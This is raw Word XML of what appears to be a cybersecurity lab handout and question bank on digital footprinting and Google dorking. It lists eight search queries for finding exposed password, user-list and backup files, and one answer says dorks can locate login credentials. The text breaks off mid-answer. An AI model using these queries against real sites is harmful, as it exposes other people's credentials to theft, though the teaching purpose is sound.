                <w:numId w:val="4"/>
              </w:numPr>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No installation - no trash in registry or system directories</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01F77261" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A90352">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0CEB97BB" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A90352">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C737D4" wp14:editId="75B5700B">
                  <wp:extent cx="5694886" cy="2375065"/>
                  <wp:effectExtent l="0" t="0" r="20320" b="0"/>
                  <wp:docPr id="28" name="Diagram 28">
                    <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86CE117-1AF9-46E3-8937-104E1958B9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528A605" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4375EA6B" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00F3558E">
            <w:p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Here, some google search syntax to crawl the password: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1. "Login: *" "password =*" filetype: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>xls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> (searching data command to the system files that are stored in Microsoft Excel)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2. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>allinurl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">: auth_user_file.txt (to find files auth_user_file.txt containing password on server).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3. filetype: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>xls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>inurl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">: "password.xls" (looking for username and password in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>ms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> excel format). This command can change with admin.xls)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4. intitle: login password (get link to the login page with the login words on the title and password words anywhere. If you want to the query index more pages, type </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>allintitle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">)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5. intitle: "Index of" </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>master.passwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> (index the master password page)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6. index of / backup (will search the index backup file on server)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7. intitle: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>index.of</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>people.lst</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> (will find web pages that contain user list). </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">8. intitle: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>index.of</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>passwd.bak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> ( will search the index backup password files) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DAEE8E9" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE3513" w:rsidRPr="001C411D" w14:paraId="05C353D5" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1431A7A7" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513" w:rsidP="00F3558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lastRenderedPageBreak/>
              <w:t>Question Bank:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF96E82" w14:textId="77777777" w:rsidR="003555DF" w:rsidRPr="001C411D" w:rsidRDefault="003555DF" w:rsidP="0032244B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F115DF3" w14:textId="77777777" w:rsidR="00684C9F" w:rsidRPr="001C411D" w:rsidRDefault="0029041B" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>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digital </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>footprinting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53DAC0AE" w14:textId="77777777" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>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Digital </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>footprinting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> refers to the traces or records that are left behind by a person or organization in the digital world. It can include information such as social media posts, search history, online purchases, and other online activities that can be used to identify an individual or their online </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>behavior</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F0EBFA3" w14:textId="77777777" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="484DFC42" w14:textId="77777777" w:rsidR="0029041B" w:rsidRPr="001C411D" w:rsidRDefault="0029041B" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing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How to use information f</w:t>
            </w:r>
            <w:r w:rsidR="00FA25CD" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>rom GHDB and FSDB</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69161054" w14:textId="77777777" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>GHDB (Google Hacking Database) and FSDB (Fuzzing String Database) are databases that contain search queries and techniques that can be used to find vulnerabilities in websites and web applications. Information from these databases can be used to identify and exploit vulnerabilities, test website security, and find hidden files or directories.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CA10A55" w14:textId="77777777" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72D346AA" w14:textId="77777777" w:rsidR="00FA25CD" w:rsidRPr="001C411D" w:rsidRDefault="00FA25CD" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing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Google search: Is it possible to search sites by value of tag attribute?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12338538" w14:textId="03DA2DDD" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Yes, it is possible to search sites by value of tag attribute using Google search. For example, if you want to find all pages that contain an image with the alt tag "logo", you can use the search query "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>intext:logo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> site:example.com" to search for pages on the website example.com that contain the word "logo" in the page content.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7463EC1F" w14:textId="77777777" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="516E7122" w14:textId="21921B7D" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FA25CD" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>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eastAsia="en-IN"/>
              </w:rPr>
              <w:t>What Data Can We Find Using Google Dorks?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11A6D0AC" w14:textId="77777777" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Google Dorks are search queries that use advanced operators and parameters to search for specific information or vulnerabilities on the web. The data that can be found using Google Dorks includes sensitive information such as login credentials, private files, and database information. They can also be used to search for vulnerable web applications and to identify websites that have been hacked or defaced.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01AA7B94" w14:textId="77777777" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B9A6F91" w14:textId="77777777" w:rsidR="00FA25CD" w:rsidRPr="001C411D" w:rsidRDefault="00BB685A" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>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the </w:t>
            </w:r>
            <w:r w:rsidR="00636575" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">following command used for: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00636575" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>filetype:txt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00636575" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00636575" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>inurl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00636575" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>:"email.txt" ?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0827CDB0" w14:textId="77777777" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>The command "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>filetype:txt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
